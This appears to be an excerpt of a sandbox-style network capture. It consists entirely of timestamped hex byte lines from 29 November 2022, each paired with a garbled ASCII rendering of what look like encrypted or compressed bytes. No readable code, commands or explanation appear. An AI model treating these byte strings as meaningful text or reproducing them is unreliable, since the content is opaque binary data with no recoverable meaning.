9f 5f e9 a9 42 19 29 48 f1 a9 37 0f 36 22 cb db af b1 d5 e5 c7 60 6c 78 43 bf 4e 09 df 18 19
                                  Data Ascii: Tusg7/~~6XT'K&"bO1yT0vJ=xsOf}X; [a`3x),XYv/rrl0He]o;WkIHdX-.2rKY9sm?VY7\sVj"cGP_B)H76"`lxCN
                                  2022-11-29 15:55:23 UTC289INData Raw: 4c b2 60 01 59 30 4f 60 31 e0 0f 95 3b 43 ec 47 4c 1c 5a 5a 61 72 91 de 5e 5f 53 53 b2 3c bc 2f 66 2f c9 bf 10 22 7a 7c 54 c6 a9 95 b7 89 d1 e2 c2 89 38 de 59 53 4c 34 55 2a fe 0c 7a 0b 06 56 17 12 92 c4 ad 70 b7 6d ac c9 59 d9 97 58 0f d8 c6 6b 11 7a 8d 22 3a d7 fe b7 2d 41 b5 63 13 13 10 05 16 58 d5 ab 4c c0 b0 1b 38 bd 0f 24 aa d0 fa 03 82 6d 4d 90 c3 a4 02 78 cf ee 2c 11 ea 97 4c ea 0f 9a bd 45 38 49 73 f1 db 77 11 24 e5 f0 9c 55 74 d1 a4 dc 50 c9 77 fd 5b 8e 53 eb ce 18 e7 79 78 45 ac da 64 cf 70 14 1b b8 ed 61 44 4b 96 44 87 7d 43 d8 f8 a8 df ab e6 42 b0 4e 52 97 4e 0d 20 db 0a 12 cb 3d c6 52 b3 4e 77 bd ea a0 d3 60 86 6e 1d ca 3e 0c 26 74 e3 84 0e e7 42 ba 21 f2 d6 a9 6f d4 0c 11 b9 39 b3 91 8f f9 01 24 72 ea 76 7c fb 7a 19 d1 2c 18 ef 3f 4a 40 d1
                                  Data Ascii: L`Y0O`1;CGLZZar^_SS</f/"z|T8YSL4U*zVpmYXkz":-AcXL8$mMx,LE8Isw$UtPw[SyxEdpaDKD}CBNRN =RNw`n>&tB!o9$rv|z,?J@
                                  2022-11-29 15:55:23 UTC305INData Raw: 08 a5 e5 6d 58 c4 60 c7 0c 84 9a 5f 60 07 c9 7f 17 36 f0 f4 a5 98 e0 14 ba 65 be ba 20 4f e6 28 f3 61 23 d6 04 16 7a ba 2a e8 d8 12 bb b7 47 ac 43 7c a3 72 60 4a c9 6d 73 5c 0d b5 14 20 27 89 ce b2 9f 1c 2f 0a de 71 84 2e f2 40 73 a7 70 3f 27 1e 6d d2 2d 27 f4 0b 90 c2 0d d6 46 10 af 87 b2 54 bb 58 89 ba 4f 0d 1c af b4 4e d8 49 3c 03 e8 a6 84 f9 2c d6 9d cd c7 f7 78 3d 76 03 8d 8a db d3 8c 22 27 bd 54 fb ba bd 8a 48 93 5b ff f0 8d 71 34 bf 01 4e 03 c8 c3 af d7 f3 f8 42 d7 19 6c 56 98 25 9c 65 1e 72 d9 a4 f7 d4 11 2f 59 6d 0c 7c 7b 7e 97 48 49 2e 8d 42 8e 8b cb c6 30 b9 9b a1 9a 9f 8a 0d 8c f8 d4 e1 44 f0 fe b8 2f 6d 11 e5 9f ba b3 65 8e 69 1d 0c 6a 6a 82 e1 b1 7d 51 ad d8 01 4a dc 48 de 71 83 d4 1b 97 4b ea 03 a8 0f 2d fe db cb 5a 79 43 2b 9b 28 ec d3 8e
                                  Data Ascii: mX`_`6e O(a#z*GC|r`Jms\ '/q.@sp?'m-'FTXONI<,x=v"'TH[q4NBlV%er/Ym|{~HI.B0D/meijj}QJHqK-ZyC+(
                                  2022-11-29 15:55:23 UTC321INData Raw: 43 92 5d 9e f8 32 bb 60 a5 e5 13 58 64 8d db 4f 4f b4 eb 53 3d 90 14 db 41 16 7e ce 8f 7c c1 49 42 26 d0 1f a5 9a 39 27 21 8f 04 a4 8f 31 6c a2 0a c3 67 ad 05 93 0f 9f b0 62 a7 96 84 8e ec 61 a3 07 93 cb 26 76 b1 89 30 ca b5 b0 6a 8e 64 a8 73 01 27 7c f5 cd 76 43 2f 0c a9 72 ea d7 f4 a1 7f 04 f4 fe 28 82 3f 30 de 12 73 89 1c a1 25 6b 39 c3 be 58 0d d8 e4 e9 bf 4d 3f 62 85 e1 ed 1b f6 9b c7 25 6c e0 b1 0f d0 3e c5 20 81 86 29 95 10 8c 7f 01 52 a9 39 c8 b4 43 74 5d d0 07 f1 8d 0c 02 d4 f9 f8 cd a0 0e 3b b5 28 76 9d 76 26 78 f3 01 c6 24 1e fc 0a 4d 3c be f4 40 3d 31 a8 95 b8 cc 0e ea 98 b7 ca 2c d0 18 5e c6 4d e0 82 fd f4 92 b0 5a fd 5a bf 4c 02 6b 14 f5 3a cd 18 21 69 58 4c 56 aa 37 5b b2 22 41 09 22 b4 b0 78 f0 74 ab 02 29 28 43 12 e8 35 bb d5 79 d3 04 ec
                                  Data Ascii: C]2`XdOOS=A~|IB&9'!1lgba&v0jds'|vC/r(?0s%k9XM?b%l> )R9Ct];(vv&x$M<@=1,^MZZLk:!iXLV7["A"xt)(C5y
                                  2022-11-29 15:55:23 UTC337INData Raw: 38 2d 49 8c c4 18 1c dd 95 5c 0f 48 13 04 8b 8b eb 5f be ad 4f f7 53 85 fb b6 da 52 4c 70 5b 54 a7 b2 2d d3 4a 31 09 f5 74 87 4d f0 5d 40 76 1b 45 84 fc 0c e4 e1 a0 2e c1 ea 10 19 9a a5 17 61 33 eb d5 86 37 76 f4 c8 6c b1 f5 cf 8e 06 7d ae ca 98 59 b8 c6 b3 04 5b 14 3f 85 b7 41 5d ae 02 8e dc 1d ea bb 7b 36 04 de fc 41 93 e6 e3 25 fa 74 9f 09 a9 05 0f a5 40 b2 79 05 62 51 45 ec 90 47 10 1c c9 6f c9 2c 66 05 13 e0 46 e0 1c 7b 5d ed 14 b2 43 c3 69 0c 3f 0e 75 f8 c2 58 fd e3 cb 7f ea a2 83 0a 11 38 7f 1b c7 67 1f 7c c0 9d d0 48 25 38 5c a1 3f 6e 60 af 1e 06 bf 65 cf 15 7b 83 fe 88 58 00 46 7b 97 46 f4 4b 4f 00 2e b3 27 11 91 7b d7 a5 09 d1 c2 45 be a6 26 31 59 9d 8d 10 f1 e5 81 26 dc af ce 03 b6 b5 76 e7 c1 24 26 79 ac 17 27 d0 5a 7d cc f9 35 8e 2c fc 8c 9a
                                  Data Ascii: 8-I\H_OSRLp[T-J1tM]@vE.a37vl}Y[?A]{6A%t@ybQEGo,fF{]Ci?uX8g|H%8\?n`e{XF{FKO.'{E&1Y&v$&y'Z}5,
                                  2022-11-29 15:55:23 UTC353INData Raw: f6 e9 06 9e 0d 53 28 b2 af c3 dc 48 4c 6e 2b 1c 6b 08 28 7a 09 fd 6a 78 39 b3 ba bd 24 98 d1 20 e8 04 c2 7d ea c4 69 93 da 1c 6e 79 9a be f5 8b c7 70 e6 37 62 e3 91 c9 79 a5 44 38 48 46 63 ce 48 ee d1 28 cd 50 a5 3f 64 b6 4d 4f 3d ef 2e 1c 2c e3 73 54 b9 b9 e6 12 2d 30 e2 d5 c1 05 0a 49 f0 f8 82 9d bf e6 fc 55 ba 68 53 e3 43 58 e1 a4 06 52 da a0 0e 2e a5 5f 2f 1c d4 bb 01 ad 52 6b a9 90 97 d6 62 22 f7 61 07 46 78 9b 5d cd 48 e9 ba 84 85 eb cc 8a 41 0c 73 87 33 4f 8f 9a ff d8 75 ef ef bd f2 c2 95 64 ce 97 2a 1b d1 a4 58 b5 ec 2f 20 eb 9d 5e 55 7c 4f 4b 74 52 84 05 6a fc 93 33 b7 fb 20 5b f3 14 17 3b 31 52 c2 1b d7 83 d0 c0 58 b4 b6 ec 93 cb af cc f8 37 71 ac 38 d8 2e 68 2c 25 cd b3 d7 8e 0c bd a6 b2 4c 2d c0 da 85 59 ba a9 58 b6 c6 34 31 a1 3d 26 6e 81 16
                                  Data Ascii: S(HLn+k(zjx9$ }inyp7byD8HFcH(P?dMO=.,sT-0IUhSCXR._/Rkb"aFx]HAs3Oud*X/ ^U|OKtRj3 [;1RX7q8.h,%L-YX41=&n
                                  2022-11-29 15:55:23 UTC369INData Raw: a8 5b 40 80 d6 7d ed b3 d9 a2 48 b0 36 eb 98 0b 0e 01 d1 de 76 0a a8 20 8e 3a 38 01 5e fb 4d 58 85 91 42 a1 47 69 75 e5 ef 8f 10 18 30 eb 5d be cd 17 3b ed 23 b8 3d ee a5 3f 52 4e c4 5b eb 29 4c e0 64 61 1d 07 62 65 ee 34 a5 20 78 d1 64 de dc 9d 34 83 be bd 76 2e d6 2d 9f 25 1a a2 89 43 0c 3c 71 91 75 28 3f b6 0c 0b 4d 10 ef a3 24 3a 07 db 4b 83 d2 0c e3 25 f5 2d 44 fa 57 cc 2a 0d 2c b4 63 f6 b4 d0 49 c1 55 6b 8a a7 f0 50 50 28 eb ab 2b d9 4a 76 62 7f e3 50 82 03 ac 03 50 a7 bd 2b 81 ac ad 62 26 fe fd 1d 66 9c c2 94 cb aa a6 29 f4 86 1d 23 1f 4d 17 50 fe 2c 93 57 15 a5 4f e4 97 68 06 47 56 0b 81 4c de 38 74 14 2b 7a 6b 37 78 20 02 65 27 31 93 ea 60 6c 7d 14 c0 d9 ec 43 e0 fd 80 60 6a 88 e2 b3 5b b6 45 10 37 03 17 67 8c 6b 94 ba 29 a1 12 86 c6 71 e3 f8 be
                                  Data Ascii: [@}H6v :8^MXBGiu0];#=?RN[)Ldabe4 xd4v.-%C<qu(?M$:K%-DW*,cIUkPP(+JvbPP+b&f)#MP,WOhGVL8t+zk7x e'1`l}C`j[E7gk)q
                                  2022-11-29 15:55:23 UTC385INData Raw: 93 fd 3b 3f 96 3b af ed a3 9a 74 05 38 05 18 a3 94 96 f9 44 47 2d 9a 25 dd ef eb 4e cd 7f 69 f4 05 e8 f1 97 40 e0 c8 35 8d b9 ee c9 2d 4e 0a 17 64 c7 b2 dd e2 e8 4a e0 58 69 8d 83 4f 90 d8 04 4a e2 68 fc b6 13 4e 80 63 19 05 19 88 ac d3 39 63 e7 d4 f0 d8 4f 56 2f 43 81 0a 20 0c 57 a1 b3 90 ec 57 06 be b3 bd 04 b6 ce 60 01 28 d2 f6 4d 87 d2 d1 2c 8c 9c 3b 96 d5 4e fb b4 9e 51 ba 80 41 ca 7a 76 51 2b 10 05 91 84 5a fb 5d 98 fc d8 9e 83 34 d5 63 f0 41 3c 39 44 3e 2c cf 9f 01 df ee 75 10 bb 37 4f 77 e0 a5 4d 7c b6 e3 6e bc 6a db 70 20 e9 ff ee e1 72 c6 33 d4 48 a3 48 3d d9 33 31 3d 43 3b 91 1b 87 4e e9 c5 f1 bc a4 2f b1 e7 54 f1 c4 ac 06 ff 77 d3 9d 5b 90 95 44 e1 aa 65 f5 89 16 87 17 51 ec 13 41 d3 99 61 6c 03 d8 e1 2d 33 1d fe 83 01 cc 40 9a 44 4d af 49 8c
                                  Data Ascii: ;?;t8DG-%Ni@5-NdJXiOJhNc9cOV/C WW`(M,;NQAzvQ+Z]4cA<9D>,u7OwM|njp r3HH=31=C;N/Tw[DeQAal-3@DMI
                                  2022-11-29 15:55:23 UTC401INData Raw: b8 e2 dd 25 a8 60 db 02 4f fd 7f 08 0f f3 e4 c0 f9 e3 4b cd 7d 3a ad 70 2d df 7e 48 d4 6d 6e ad d4 df 50 c8 50 69 bd 04 d7 27 31 1b ea 26 1d 65 32 7c b5 3d d8 50 5d af 17 b6 7b 47 1e 9f 87 d5 37 d7 dc 82 9f 4a 50 e8 a8 5e ff 62 e1 aa 5d 3c 1d a4 0f 5d 3a 6e 7a 05 c8 fa 3b 05 87 47 c7 ef a8 4d 15 a2 5c da ee d1 01 41 6f 29 84 c5 c8 a1 ec f3 a1 fc 10 1a cc 89 5c 79 39 b8 75 b9 b7 3b 56 ed 9d c6 de 92 18 1f 94 bf fe 66 ec 15 b3 dd 27 6d e9 75 bb a6 99 d2 3b 75 e1 e2 ad b5 74 13 2f 60 2b cd af 35 63 b2 09 6e ef 6b 03 30 11 f1 99 80 2d 14 d5 96 05 ee 80 35 2b 49 6d 73 fd 09 49 d2 60 f1 1f 6a da 6f 5b cc 6b 53 b7 b0 67 31 c9 22 06 e5 e3 84 a2 3a 9e f5 c9 b7 a4 1c 1d 14 53 78 79 2d d2 53 cc c2 7a 27 23 3e 97 55 1b 35 23 c1 a4 6f dd a2 50 70 61 96 94 c9 89 4a 29
                                  Data Ascii: %`OK}:p-~HmnPPi'1&e2|=P]{G7JP^b]<]:nz;GM\Ao)\y9u;Vf'mu;ut/`+5cnk0-5+ImsI`jo[kSg1":Sxy-Sz'#>U5#oPpaJ)
                                  2022-11-29 15:55:23 UTC417INData Raw: d2 75 5c bd cc 49 da f9 4f 39 5e 67 73 5e ad 44 c6 94 31 04 9b a2 c8 3b 77 20 cf 8c d4 c2 5c 3f 94 e6 ab 21 8f 07 bc 66 b3 83 e6 fb 1b 23 0d 6a c4 c5 5f be cb 97 28 40 f4 c6 d5 1b 52 83 2d e1 7d b1 91 d7 68 c9 f3 9f 57 31 19 36 ac 0f 95 cc f8 3f 79 55 38 65 05 a8 ec 2f 8f dc ab a3 d2 fc 4a 09 c5 b4 d4 14 42 b5 2c 90 80 d0 e7 dc 2b 2e e5 e9 4a 24 d8 8c 23 14 f8 68 ae a1 e9 a4 de 04 0a f7 e5 98 8f 96 a6 92 bf 40 f3 6e 4f a1 de 89 93 e4 a4 3a 93 47 72 eb 1f fa 92 53 87 66 bf 79 20 a8 32 74 46 38 0e 72 4b 55 bd ee 94 0b 34 1f a2 26 8e f5 33 e0 50 f4 93 a7 7a d4 df 0d 68 bc 58 09 69 07 7f ee 71 ff 8a a4 0d 45 1d 85 1c f0 49 b9 80 89 62 9f c3 91 2e 46 1d bc cc 08 d9 e4 eb 93 1c bf 97 99 70 c2 f9 e6 59 c2 fc 7f 5f bf 20 a5 76 3d 8c 96 56 7f 1c 93 7e 2a ac ec 78
                                  Data Ascii: u\IO9^gs^D1;w \?!f#j_(@R-}hW16?yU8e/JB,+.J$#h@nO:GrSfy 2tF8rKU4&3PzhXiqEIb.FpY_ v=V~*x
                                  2022-11-29 15:55:23 UTC433INData Raw: 16 03 22 20 e4 12 0c e3 c8 c1 8c 88 f6 f6 ff 99 65 68 03 a4 76 1a 3d b1 65 11 29 f1 bf ca 0e cc bc 4a 8d 06 48 28 df de 4c e6 22 3e 24 88 a5 e1 59 78 78 82 b8 5f c5 55 f1 ad c4 28 91 aa 64 d2 86 95 6b 32 95 69 fe fd a4 5a e9 df b1 69 26 00 a4 7d 81 25 97 1e c7 76 a1 30 65 72 23 9d 50 6d 97 89 26 eb 99 9f 86 f3 ed 9d 10 a9 ab 7c 33 bc dc 42 89 ba 4b b2 4f 09 79 c4 e5 eb 6f 10 88 ef 49 65 32 13 71 01 66 6c d4 f7 c5 94 47 94 c4 80 47 52 4c f3 d0 87 80 8e f0 3c 4a 38 64 84 5c 4a 4a 25 5b 7b 94 27 ef d0 89 c4 58 92 13 09 b8 3b 8e 66 d8 45 ae c8 b1 17 df 30 c3 eb 17 66 79 5c 70 0c 24 87 3a 2e 04 53 7d 2f 84 e9 37 fe 2e eb 27 f3 86 22 c2 8a 70 60 10 ed 73 d7 14 f5 26 8e d1 4e 35 85 3b cf 9d 5a 43 e5 8a 7f 68 d6 52 57 db d5 d3 5e 7e e7 a8 c1 0e a0 79 63 9f 49 58
                                  Data Ascii: " ehv=e)JH(L">$Yxx_U(dk2iZi&}%v0er#Pm&|3BKOyoIe2qflGGRL<J8d\JJ%[{'X;fE0fy\p$:.S}/7.'"p`s&N5;ZChRW^~ycIX
                                  2022-11-29 15:55:23 UTC449INData Raw: b0 aa a8 f9 7e e3 55 81 a5 ae 4f b0 8a 61 27 f5 96 a6 76 9c cb 16 13 21 1f a2 9b 60 7a 5a 21 92 b2 22 85 ef 5c 25 d0 ee 1c 2e 67 ff 00 2e d3 02 10 d9 5e 4e d7 82 0f 95 30 8d 0c fc e6 e8 25 70 23 dd de f0 f3 9c e7 c4 df 4d eb a5 d5 84 bb 68 8f ea 74 f2 13 08 84 b8 ac b6 d3 73 d4 a7 21 23 47 9c e7 8c 4c 6d 5d f5 f0 79 a5 e3 ce 24 b5 b0 8e 8d 27 67 d6 b6 ea 52 5f 60 a6 75 ac a6 2c f9 31 37 0b d9 62 76 62 d7 03 b8 33 94 b8 45 8d 80 f9 38 35 01 a2 92 ef a5 ca 24 ad 0f 4f f2 5e 14 03 8b d4 cd 9d 84 cf bc 2f 7d ad e1 74 28 f6 a6 a6 19 e3 f3 cc ad 18 17 b3 2a a8 b4 e0 d0 f0 c3 e6 7f bb bd d8 8d 33 40 b9 08 97 96 67 9d b5 9a b8 dc 2e bf a8 46 82 27 db 4e 0c 4a 87 17 7d 0a 27 a9 d0 50 be 20 0a 5c 90 36 e6 8a 84 f9 30 b0 af 73 c6 46 97 fe 89 b1 6a 47 d2 df 24 db 9c
                                  Data Ascii: ~UOa'v!`zZ!"\%.g.^N0%p#Mhts!#GLm]y$'gR_`u,17bvb3E85$O^/}t(*3@g.F'NJ}'P \60sFjG$
                                  2022-11-29 15:55:23 UTC465INData Raw: f5 b9 b8 f2 c5 52 28 b6 a6 d1 ca b6 65 34 8d bb 2d a9 d1 af 56 60 7d 56 95 5e 73 ca 95 6c 2b 34 93 f5 de 52 f1 c2 ae b0 c4 e2 e4 a3 0f 06 74 0a 17 ac ba 74 35 72 d4 f1 b0 85 99 b6 2c 17 26 c5 4d ff ea 4d 89 78 9c 90 05 20 02 29 73 58 ec 9d 78 81 bb 0e 11 b3 bd bb 17 f9 a7 86 c4 6b 92 1d 48 a4 70 19 aa a4 4d 7a 9c 6e 98 cd 28 80 1d f1 cd 89 0e 25 99 00 cc 65 7c d9 59 6e b4 93 5b e0 36 ef e4 a7 db 50 69 95 54 2c b6 2d 30 5d 01 10 5f a3 d3 81 5c 40 7a d6 61 4e 45 68 7e f7 71 f0 7a 6e 4d 61 64 ea 54 82 ac 9c ff a6 79 39 33 33 7d b5 75 fb e5 59 2f 49 30 2c bf 56 d8 f4 9c df 15 3d 6d df 40 d8 89 3b f4 7a f6 21 72 10 c5 fb 72 59 56 91 58 e4 e5 2e 94 85 36 85 52 05 63 ce 3f e6 5f 2e 67 c1 4e 1d ac 87 54 b4 49 00 34 c9 ef 42 3a fe 0b 4c 09 ec 6a 9a 83 ee ce f1 b3
                                  Data Ascii: R(e4-V`}V^sl+4Rtt5r,&MMx )sXxkHpMzn(%e|Yn[6PiT,-0]_\@zaNEh~qznMadTy933}uY/I0,V=m@;z!rrYVX.6Rc?_.gNTI4B:Lj
                                  2022-11-29 15:55:23 UTC481INData Raw: 08 6e 21 6c a0 25 4e ad d0 3d 06 ad 82 b1 7c d9 ce fa bd 8b ee 8d 56 02 84 80 c7 c8 ba 28 6f ef bb c4 fe 5c 39 ca af 37 b9 32 19 60 10 d3 81 47 f0 42 8e 3c 96 66 4e 95 65 b6 2b 26 50 12 19 ee b4 ef ff 81 8f 9c 72 11 51 6c b6 3e 93 f9 b5 e8 a2 2b 57 70 a9 31 42 2c bc b9 81 79 fc ad 5f cc 8d a1 3e f7 2f d4 cf 2b be 47 25 d5 50 b8 ba 79 f3 d9 3b 3e 40 df 36 68 52 19 89 9b 0b d1 54 77 4c a5 d0 a6 e5 21 d2 54 69 32 81 c7 5a 96 b6 97 01 01 c4 09 e4 36 90 94 b9 a0 49 05 bb f6 63 a0 3d 39 4f 3a 79 9c 23 95 d2 83 61 42 4c 66 d2 1c fe 84 a5 bf 41 c5 1c 41 b2 f5 65 db bf 21 c1 6a 7a 1e 73 07 ce da 1b 98 ca a9 71 28 34 08 8a e0 7e db b6 37 a6 f0 d2 97 c7 88 ff 7d ed 9a 47 f0 7b 3f c5 5a 9a 04 f1 d0 a6 93 f5 83 82 a6 0c 98 1e 08 ad bd 0a 82 a9 11 d8 4e 88 ba 06 a0 d9
                                  Data Ascii: n!l%N=|V(o\972`GB<fNe+&PrQl>+Wp1B,y_>/+G%Py;>@6hRTwL!Ti2Z6Ic=9O:y#aBLfAAe!jzsq(4~7}G{?ZN
                                  2022-11-29 15:55:23 UTC497INData Raw: b4 30 8d 50 ef 85 a2 3a d7 58 8d 8e 31 4b fa 19 fe 02 36 02 d2 7b c6 0d 58 cd c8 68 8d c0 d8 44 a1 15 1f 55 c0 2c 1b 22 2e 8c 65 18 d3 6e 53 50 14 fe f6 0b 76 b6 98 14 ec a7 f2 92 4a b4 08 cd f3 9a 85 1b ca bc 0a ce 73 68 38 59 49 3e 01 cc db 79 5a 36 63 81 bc a2 b1 a7 41 9c 3b 6e e4 7a 57 e3 ef 01 a4 f8 3e 5f bc 41 db e6 84 57 fe 8e 87 86 11 56 57 81 20 d2 9e 45 bc c4 ec ef f6 e8 31 54 9b e4 9f 0e fc 1d 0c 53 ab cd 63 a2 f6 f0 73 e3 03 be e8 11 42 1e 32 c2 25 9c c8 f5 5d 22 12 b6 47 bb f1 28 7d bb e6 be 37 da 05 ad 26 f5 ca 5c bb 0b ad 18 fe 92 27 bb ed a4 7d f3 22 11 55 12 90 68 55 31 ef 81 ff fd 3f 34 02 19 76 7a 96 8c 41 69 ef 00 ad eb f7 e3 8b 14 1d 2f d4 c4 40 09 5c ac cf 4b fd 90 17 64 37 81 e1 f5 ec ca d0 d7 a8 a2 70 b9 66 5a cc 41 2b 2e ff 2f bf
                                  Data Ascii: 0P:X1K6{XhDU,".enSPvJsh8YI>yZ6cA;nzW>_AWVW E1TScsB2%]"G(}7&\'}"UhU1?4vzAi/@\Kd7pfZA+./
                                  2022-11-29 15:55:23 UTC513INData Raw: 6f 0e 2c fd b5 0a 67 0a 8d 5c 23 8d 5d 5c d3 c3 bb 73 93 e4 99 cb c6 fb 1a 70 94 1c 74 77 50 ca e6 23 83 0c 99 80 de 27 de d9 37 b5 9a aa 0f 7d 08 e7 03 66 af 93 d1 0e 0b 61 97 28 2c a6 ce 55 22 ba ec 27 b4 1c 1a 40 aa c7 fc 13 7a 6f 1c 9b 12 b9 a4 9f bf 4e 7b f3 3a 73 fd c5 9e 74 65 d1 c5 8d 4b 58 60 d5 c6 7d e4 71 bd 62 0a cf 99 e9 5e 3e 17 16 d0 54 09 5a 66 06 d2 82 78 85 eb 0c 38 10 85 e4 f3 3c 7c 65 f5 bc ee 46 99 62 f7 04 d6 3a a4 ee e9 42 b8 8f a2 ee 0a ca a0 32 99 95 d2 4b ae fc fa eb 19 6b e0 0a 85 d2 44 64 74 6d 17 66 8d 51 04 84 84 f8 75 57 6c 43 f0 a6 28 d3 af 4b b3 97 e3 de aa c7 30 83 bc 2e 0d 61 85 78 87 2a 46 c3 0c 10 15 ab ef a4 ee 6a 8e 46 b9 3d 0f b1 20 8b 9e 94 70 60 a0 8b 3b 49 59 0e 0c b6 d3 38 71 2a 15 6a c8 75 23 d0 79 5d 79 6b 99
                                  Data Ascii: o,g\#]\sptwP#'7}fa(,U"'@zoN{:steKX`}qb^>TZfx8<|eFb:B2KkDdtmfQuWlC(K0.ax*FjF= p`;IY8q*ju#y]yk
                                  2022-11-29 15:55:23 UTC529INData Raw: 05 4c 6a ca 1c 52 ab 21 94 9f 35 ba f6 f6 23 21 8b 8b 39 1f 4c 67 68 39 2b 0e 85 26 4c 17 ab be 9c 74 53 cf 44 ee 52 9b 80 48 43 6d 18 2c 1b b4 39 29 7e ae 3c 0f 6f 11 73 fb 65 19 0c 3e 73 92 aa 0d d7 ec 62 86 a1 9b a7 cc a9 24 b7 92 a6 66 26 8b ee 59 a3 bc c1 3e 04 58 d2 94 46 e4 c0 7c 1e 75 75 12 e6 cf 17 45 4c f5 c2 28 87 fd 57 e8 5b 7b da 95 bd 5e 68 89 0b 46 54 d1 31 14 30 b3 9b e4 48 c9 02 a9 08 6a fe ba 71 c6 e4 ff 92 11 50 00 72 d4 ca 4c a3 af 9c ca 40 ed 56 fb 7b 73 0b 5f 2d 32 e5 27 b3 35 6a d7 fe e0 fd a4 16 93 6f 3e 44 8e 22 94 18 75 01 cc 8e 3a b8 53 8d 1a 61 6a 50 1c 2d 95 05 4d f8 7c f2 57 8b 05 bd 1d ac 27 60 c5 1a 2f 7d cf 5d 94 d6 be 8f d0 96 19 3e 1c 6c a5 b0 ba 0a 00 83 96 b8 70 b9 57 68 c3 8c f2 23 8d 03 6f 04 ba d3 08 5a 2a 5a e1 90
                                  Data Ascii: LjR!5#!9Lgh9+&LtSDRHCm,9)~<ose>sb$f&Y>XF|uuEL(W[{^hFT10HjqPrL@V{s_-2'5jo>D"u:SajP-M|W'`/}]>lpWh#oZ*Z
                                  2022-11-29 15:55:23 UTC545INData Raw: a9 b2 83 e3 87 45 00 dc 63 d2 8d 7a 8a cb 33 b0 4b 29 b8 7b a1 21 15 8a 76 b4 62 ea 35 74 d7 2f 9e 78 26 b5 6b f3 2b f4 e5 12 57 e4 dd 70 f2 9e 8c 0d 94 08 b3 6a 0e 3f 15 1e b6 f9 84 80 47 26 ad 65 fa b3 23 69 f1 a2 13 9a d9 ef d0 8e f1 02 0b 7b a4 59 61 52 60 c9 e9 c1 a7 94 d2 02 2e 6c cf 0c 02 11 56 da 73 3c 1e dd 71 2c a3 31 2c 08 bc 3a fc 13 43 75 ff be f5 ee db 1a 51 89 11 37 34 89 2b 55 13 eb 17 b6 9c 58 6a f7 50 cb 09 9e fd 79 c0 9e 64 9c bc 28 6b 2f a9 55 00 e3 4a eb 19 5b b8 02 80 45 9e 12 e7 8f 12 a1 04 08 5a 29 6b 5c 21 06 29 a0 09 e7 46 80 50 6a db cb 27 4d 23 97 66 b5 00 1a 74 e0 13 da fd 15 4b 69 83 98 4d 7d fe 17 e7 ed c7 12 26 b4 1e 0a 6e 66 29 61 ea e2 f8 08 e5 f5 2b df 84 7e 4f 85 81 f8 69 af 44 cb 1a 3c 7c c8 db 88 2e c6 33 b0 19 7d 11
                                  Data Ascii: Ecz3K){!vb5t/x&k+Wpj?G&e#i{YaR`.lVs<q,1,:CuQ74+UXjPyd(k/UJ[EZ)k\!)FPj'M#ftKiM}&nf)a+~OiD<|.3}
                                  2022-11-29 15:55:23 UTC561INData Raw: 46 bc 44 c4 0c 00 9b 5e 2e 2a d8 c4 fc eb 06 51 b5 ac a9 74 39 c1 ff 93 7c 26 75 89 02 b1 1f 6d cd c8 fe 27 36 b4 20 0c e3 b3 7c 78 9c fa 78 ac 05 b6 cf 00 90 ee ba 77 37 09 b0 e8 f5 a0 3a 46 99 0f ab ee f0 13 a9 1a 4e ab b1 42 01 3b f6 e8 e7 60 d3 e3 3f de 56 a0 24 5b d0 f8 7a 60 5f cd 1a 26 fb c1 8a 94 44 73 04 8f 50 ae 29 6d a0 0c c7 eb b6 6b d1 18 a8 4d 0f 06 4e 39 af 5a 99 d1 d6 40 7e e4 1d aa 4b 87 44 b0 e0 fb d0 aa d6 f2 00 98 ab bd fa d7 1e be 73 ed b5 b7 b6 59 d0 7e 98 e9 5a f3 5e e7 23 6f c3 b3 c7 ac 5d 47 5b 68 8b a6 b2 16 63 f8 d7 5f 3a c5 3f 6e 54 ba 1c f1 c8 c8 42 63 33 df 07 79 c3 c3 d3 3c 29 c8 20 56 02 c8 5d fc 72 74 1f f6 b5 72 a3 76 e6 f5 84 57 e1 34 70 c9 60 2f 63 46 f7 18 bf 80 64 4e 39 5f 33 8b 9b e5 e0 5c d4 cf 19 e8 9a 93 7c a4 47
                                  Data Ascii: FD^.*Qt9|&um'6 |xxw7:FNB;`?V$[z`_&DsP)mkMN9Z@~KDsY~Z^#o]G[hc_:?nTBc3y<) V]rtrvW4p`/cFdN9_3\|G
                                  2022-11-29 15:55:23 UTC577INData Raw: 63 70 76 d5 e2 14 eb 60 a9 30 63 be a8 ab 25 d1 c8 ef 5b d5 c1 8b 8c 4b 90 f0 58 f8 4e 3d 03 0b e2 27 2b d2 e3 54 af 05 09 0f eb 85 22 02 4f 4e f9 27 ad 64 37 9b 16 8a 83 b5 2b a1 3f de 4d ff 32 c2 e7 f9 b6 a4 a4 85 5f 22 91 6a 96 4a b2 a9 c0 b8 4e 95 8f 3e 8b 91 eb 6d 65 86 37 d9 04 ba 91 e5 ab e0 00 78 1e 5b c3 79 02 af ce af 40 ed 6f a3 ca d2 f8 23 e6 c9 d7 a1 d9 fd ac 97 e9 e1 3c 14 5f f3 57 fd 5b 0e 8c 6e 26 83 29 24 46 86 6e 7d 50 73 26 b4 a9 48 76 6b 11 17 d9 ec 32 00 4e 64 30 37 cd d2 d3 c5 5b 81 e8 72 0c 83 bd 92 52 34 04 b8 48 87 74 c1 4c a5 f6 c1 f6 54 6f 44 34 39 c6 3e 5f 53 2e 82 08 00 85 15 7c b6 ce 95 64 21 4f 2f 76 19 80 84 43 69 7b c7 23 2e f7 e7 55 83 84 84 16 b2 37 2e 52 f5 1e 02 73 42 7f 5b 53 3f 9b 0c 02 20 92 33 03 99 59 9e 85 c4 52
                                  Data Ascii: cpv`0c%[KXN='+T"ON'd7+?M2_"jJN>me7x[y@o#<_W[n&)$Fn}Ps&Hvk2Nd07[rR4HtLToD49>_S.|d!O/vCi{#.U7.RsB[S? 3YR
